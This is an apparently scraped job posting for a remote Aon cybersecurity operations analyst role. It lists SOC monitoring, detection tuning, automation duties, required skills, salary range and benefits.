Search
Header navigation
Cybersecurity Operations Analyst

Cybersecurity Operations Analyst

AON
locationDallas, TX, USA
remoteFully Remote
PublishedPublished: 6/18/2026
Insurance Operations Manager
Full time

Job Description

The Cybersecurity Analyst – Threat Detection, Automation & SOC Operations is a hands-on role supporting Aon's global Cybersecurity Command Center (AC3). This position is designed for SOC analysts (Level 1–Level 3) focused on alert triage, incident investigation, and continuous improvement of detection and automation capabilities.

The role involves monitoring and analyzing security events, responding to alerts, and enhancing alert quality, playbooks, and workflows. The analyst will collaborate closely with Security Operations, Threat Intelligence, Security Engineering, and Incident Response teams to ensure comprehensive coverage across endpoint, identity, cloud, email, and network environments.

The ideal candidate is curious, analytical, and comfortable working directly with security tooling—investigating alerts, understanding attacker behavior, and contributing to the tuning and automation of SOC workflows.

Aon is in the business of better decisions

At Aon, we shape decisions for the better to protect and enrich the lives of people around the world.

As an organization, we are united through trust as one engaged team and we are passionate about helping our colleagues and clients succeed.

What the day will look like

SOC Monitoring & Investigation

  • Monitor and triage alerts across platforms including LogScale, CrowdStrike Falcon, XSOAR, Microsoft, and Okta
  • Perform initial investigation and validation of security events to determine severity and scope
  • Escalate incidents with clear documentation, supporting evidence, and recommended actions
  • Conduct in-depth investigations into suspicious endpoint, identity, network, and cloud activity (L2/L3)
  • Support incident containment and remediation in coordination with Incident Response and Engineering teams

Detection Development & Tuning

  • Provide feedback on alert quality, noise, and detection gaps based on operational experience
  • Assist in creating and refining detection rules and correlation logic using real-world cases and threat intelligence
  • Tune existing detections to reduce false positives and improve SOC efficiency
  • Validate detection effectiveness against known attacker behaviors and MITRE ATT&CK techniques

Investigation Enablement

  • Design and refine investigative workflows to guide analysts from triage through resolution
  • Develop and maintain runbooks, playbooks, and procedural guides for common alert types
  • Identify missing context or data needed to accelerate investigations (e.g., enrichment, logging, asset data)
  • Recommend and implement improvements that reduce analyst effort and decision time

Security Automation & Playbooks

  • Utilize and enhance XSOAR playbooks and automation workflows within daily SOC operations
  • Identify repetitive tasks suitable for automation and partner with engineering teams to implement solutions
  • Test, validate, and optimize automated actions to ensure they support investigations effectively
  • Contribute to continuous improvement initiatives focused on SOC scalability, speed, and consistency

Security Analytics & Telemetry

  • Develop and execute queries in LogScale and other analytics platforms to support investigations and threat hunting
  • Analyze telemetry across endpoint, identity, cloud, email, and network sources to identify suspicious activity
  • Identify trends, recurring issues, and visibility gaps
  • Support development of dashboards and reporting for SOC performance and incident trends

Collaboration & Knowledge Sharing

  • Partner with AC3 analysts to identify operational challenges and propose improvements
  • Work with Threat Intelligence and PTO teams to operationalize intelligence into detections and playbooks
  • Collaborate with Security Engineering to enhance logging, telemetry, and data availability
  • Contribute to post-incident reviews and continuously update runbooks and detections

How this opportunity is different

  • Combines SOC operations, detection engineering, and automation—not just alert triage.
  • Lets analysts directly shape detections, playbooks, and workflows instead of only following them.
  • Proven focus on XSOAR and automation, giving a clear growth path into advanced detection and engineering roles.
  • Broad visibility across endpoint, identity, cloud, email, and network with modern tooling (LogScale, CrowdStrike, Microsoft, Okta).

.

Skills and experience that will lead to success

  • Minimum 2+years of experience in a SOC, Cyber Defense Center, MDR, or similar environment (L1–L3) will be preferred
  • Strong understanding of attack techniques, alerting, and MITRE ATT&CK framework
  • Hands-on experience with SIEM platforms such as LogScale, Splunk, Microsoft Sentinel, or Elastic
  • Familiarity with EDR tools (preferably CrowdStrike Falcon)
  • Exposure to SOAR platforms (e.g., XSOAR) and interest in automation
  • Basic scripting experience (Python, PowerShell, or similar) preferred
  • Strong analytical, troubleshooting, and evidence-based decision-making skills
  • Effective written and verbal communication, including incident documentation and handoffs

Preferred Backgrounds

  • SOC Analyst (Tier 1–3)
  • MDR Analyst
  • Incident Response Analyst
  • Threat Detection Analyst
  • Detection Engineer (with SOC experience)
  • Security Operations Engineer
  • Security Content Developer (with SOC exposure)

Education: Bachelor's degree in Computer Science or equivalent years of industry experience.

For positions in San Francisco and Los Angeles, we will consider for employment qualified applicants with arrest and conviction record in accordance with local Fair Chance ordinances.

Aon is not accepting unsolicited resumes from search firms for this position. If you are a search firm, you will not be compensated in any way for your submission of a candidate, even if Aon hires that candidate.

Nothing in this job description restricts management's right to assign or reassign duties and responsibilities to this job at any time.

Pay Transparency Laws: The salary range for this position (intended for U.S. applicants) is [$90000 to $106000] annually. The actual salary will vary based on applicant's education, experience, skills, and abilities, as well as internal equity and alignment with market data. The salary may also be adjusted based on applicant's geographic location.

A summary of all the benefits offered for this position:

Aon offers a comprehensive package of benefits for full-time and regular part-time colleagues, including, but not limited to: a 401(k) savings plan with employer contributions; an employee stock purchase plan; consideration for long-term incentive awards at Aon's discretion; medical, dental and vision insurance. This role does not accrue vacation. Rather, this role is eligible to take paid time off at the discretion of the employee and management in accordance with company policy and practices. Various other types of leaves of absence; paid sick leave as provided under state and local paid sick leave laws, short-term disability and optional long-term disability, health savings account, health care and dependent care reimbursement accounts, employee and dependent life insurance and supplemental life and AD&D insurance; optional personal insurance policies, adoption assistance, tuition assistance, commuter benefits, and an employee assistance program that includes free counseling sessions. Eligibility for benefits is governed by the applicable plan documents and policies.

#LI-NS1

#LI-REMOTE

2579990